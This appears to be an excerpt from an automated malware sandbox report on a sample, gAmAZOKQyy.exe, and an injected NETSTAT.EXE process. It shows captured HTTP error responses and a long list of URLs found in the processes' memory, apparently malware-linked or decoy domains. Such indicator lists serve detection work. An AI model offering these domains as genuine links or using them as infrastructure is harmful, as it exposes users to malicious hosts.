20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 20 23 34 31 38 33 63 34 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 20 7d 0d 0a 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 68 31 20 7b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 36 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 36 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 31 30 30 3b 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 23 66 66 66 3b 20 7d 0d 0a 20 20 20 20 20 20 70 20 7b 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 35 29 3b 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 31 30 70 78 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 20 66 6f
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 403 Forbidden
              Cache-Control: no-cache
              Content-Type: text/html; charset=utf-8
              Strict-Transport-Security: max-age=31536000
              X-Content-Type-Options: nosniff
              X-Frame-Options: deny
              X-XSS-Protection: 0
              Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; img-src data:;
              connection: close
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 23 Dec 2024 03:08:38 GMT
              Server: Apache
              Content-Length: 389
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 23 Dec 2024 03:08:40 GMT
              Server: Apache
              Content-Length: 389
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 23 Dec 2024 03:08:43 GMT
              Server: Apache
              Content-Length: 389
              Connection: close
              Content-Type: text/html
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Date: Mon, 23 Dec 2024 03:08:46 GMT
              Server: Apache
              Content-Length: 389
              Connection: close
              Content-Type: text/html; charset=utf-8
              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Mon, 23 Dec 2024 03:10:04 GMT
              server: LiteSpeed
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Mon, 23 Dec 2024 03:10:07 GMT
              server: LiteSpeed
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Mon, 23 Dec 2024 03:10:10 GMT
              server: LiteSpeed
              Source: global traffic
              HTTP traffic detected: HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Mon, 23 Dec 2024 03:10:12 GMT
              server: LiteSpeed
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.0000000003E76000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003616000.00000004.00000001.00040000.00000000.sdmp
              String found in binary or memory: http://llmsforrobot.xyz/033w/?4v7=kZ/YQzY58uTPDy1SllACl2sKF
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwf.gsjrylbmrbn.com/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwf.hspgqdvvbut.com/yqh/5.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwf.kowxgdndoma.com/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwf.lvsx.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwf.lzyt.com.cn/h/725.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwf.niunaizhibo.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwf.qqai98.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwf.yelangzhibo.top/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwg.51meiyu.com.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwg.fastxcx.cn/w/696.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwg.haixingzhibo.top/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwg.hblbs.cn/l/9.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwg.mijuzhibo.top/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwg.wlkdsn.com/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwg.xinxingzhibo.net/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwg.yinghuozhibo.net/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwg.youyouzhibo.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwh.hschph.cn/nkvqx/52.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwh.huamizhibo.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwh.mahuazhibo.net/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwh.nb-jg.cn/a/899.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwh.ouzhoubeigov.com/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwh.proof100.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwh.q245r.com.cn/fjcs/934.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwh.sup-bond.com.cn/xh/17.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwh.tianshizhibo.top/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwj.alizhibo.cc/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwj.dielianzhibo.net/tavg/8398.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwj.jgsjdqwqnrp.com/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwj.langlangzhibo.top/h/72477.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwj.lksdin.com/s/734.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwj.qsnjtjyw.cn/e/9.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwj.xiaohongmaozhibo.cc/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwj.yediezhibo.top/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwk.dqzhbfahbcs.com/hwj/953.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwk.etalslf.com/drqe/1.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwk.hn371.com.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwk.lbqqk.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwk.qituzhibo.cn/xrgg/7.html:;
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwk.sdhnwj.cn/kar/19114.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwk.tj1x.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwk.uebmemfsfyk.com/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwl.chengsezhibo.cc/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwl.haixingzhibo.top/nrb/8.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwl.hk50707.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwl.qianjiaozhibo.cc/b/89857.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwl.qingguozhibo.top/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwl.qjqyf.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwl.swhd.com.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwl.xndanbao.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wwl.xrmvwgjxmxk.com/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wws.bbpzxgowqau.com/r/82359.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wws.changezhibo.top/def/94991.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wws.gzyuecong.cn/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wws.huamizhibo.cn/cvbbq/961.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wws.langlangzhibo.cn/os/4398.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wws.moxiuzhibo.cc/
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wws.rvrktllmcvl.com/lfp/44.html
              Source: NETSTAT.EXE, 00000005.00000002.3573509820.000000000419A000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.000000000393A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wws.tbes.com.cn/
              Source: gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.2023kuanmeiyingzhibo.com
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aazhibo.net
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aazhibo.net/binding
              Source: gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/gkfy/
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/css/appsdetail.6f4104a5611f3a6cc38f23add3deb
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/css/pcmodule.edd4638c5c3b3039832390269d40f1d
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/adblock.fe363a40.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/aggregatedentry.fe363a40.js
              Source: gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/appsdetail.fe363a40.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/bl.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/broadcast.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/common.fe363a40.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/footer.fe363a40.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/footerbar.fe363a40.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/header.fe363a40.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/index.umd.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/js.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/nc.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/pcmodule.fe363a40.js
              Source: NETSTAT.EXE, 00000005.00000002.3575122188.0000000006340000.00000004.00000800.00020000.00000000.sdmp, NETSTAT.EXE, 00000005.00000002.3573509820.0000000004650000.00000004.10000000.00040000.00000000.sdmp, gAmAZOKQyy.exe, 00000006.00000002.3573190994.0000000003DF0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.aihuzhibo.net/template/news/wandoujia/static/js/pullup.js
